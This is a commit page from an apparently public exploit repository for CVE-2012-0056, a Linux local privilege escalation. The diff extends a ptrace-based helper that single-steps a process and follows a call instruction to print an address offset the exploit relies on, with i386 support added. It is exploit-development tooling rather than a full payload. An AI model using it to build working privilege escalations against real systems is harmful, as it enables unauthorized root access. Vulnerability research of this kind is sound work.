diff options
author | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-24 08:23:17 +0100 |
---|---|---|
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-24 08:23:17 +0100 |
commit | 256a7c93c7e2e8c043a3168dc740466c4cf2b008 (patch) | |
tree | 7ec1e206c563825239f4f323b1bf7b4db2280f9d | |
parent | Add initial version of ptrace finder for x64. (diff) | |
download | CVE-2012-0056-256a7c93c7e2e8c043a3168dc740466c4cf2b008.tar.xz CVE-2012-0056-256a7c93c7e2e8c043a3168dc740466c4cf2b008.zip |
Follow the call.
-rw-r--r-- | ptrace-offset-finder.c | 22 |
1 files changed, 18 insertions, 4 deletions
diff --git a/ptrace-offset-finder.c b/ptrace-offset-finder.c index 34e5682..d339c18 100644 --- a/ptrace-offset-finder.c +++ b/ptrace-offset-finder.c @@ -1,5 +1,6 @@ #include <stdio.h> #include <stdlib.h> +#include <stdint.h> #include <string.h> #include <errno.h> #include <unistd.h> @@ -9,7 +10,6 @@ #include <sys/user.h> #include <sys/ptrace.h> #include <sys/reg.h> -#include <asm/unistd_64.h> int main(int argc, char *argv[]) { @@ -31,9 +31,23 @@ int main(int argc, char *argv[]) ptrace(PTRACE_SINGLESTEP, child, NULL, NULL); wait(NULL); ptrace(PTRACE_GETREGS, child, NULL, ®s); - if (regs.rip < 0x700000000000) { - printf("0x%lx\n", regs.rip); - break; +#if defined(__i386__) +#define instruction_pointer regs.eip +#define upper_bound 0xb0000000 +#elif defined(__x86_64__) +#define instruction_pointer regs.rip +#define upper_bound 0x700000000000 +#else +#error "That platform is not supported." +#endif + if (instruction_pointer < upper_bound) { + uint32_t instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL); + int operator = instruction & 0xFF; + if (operator == 0xe8 /* call */) { + int32_t offset = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer + 1, NULL) + 5; + printf("0x%lx\n", instruction_pointer + offset); + break; + } } } } else { |